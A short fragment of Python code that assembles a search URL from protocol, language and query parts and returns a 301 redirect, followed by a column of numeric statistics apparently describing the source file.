url = "{}{}{}{}{}{}".format(
protocol, search_url, _question_mark, _lang, _and, _expr)
return redirect(url, code=301)
| 34.957888
| 128
| 0.625358
| 7,103
| 58,939
| 4.929044
| 0.101929
| 0.024678
| 0.015595
| 0.010625
| 0.523435
| 0.470881
| 0.424124
| 0.383137
| 0.361258
| 0.34015
| 0
| 0.009688
| 0.252193
| 58,939
| 1,685
| 129
| 34.978635
| 0.784663
| 0.055753
| 0
| 0.405186
| 0
| 0.005673
| 0.154816
| 0.049895
| 0
| 0
| 0
| 0.001187
| 0
| 1
| 0.051053
| false
| 0
| 0.019449
| 0.004052
| 0.143436
| 0.002431
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|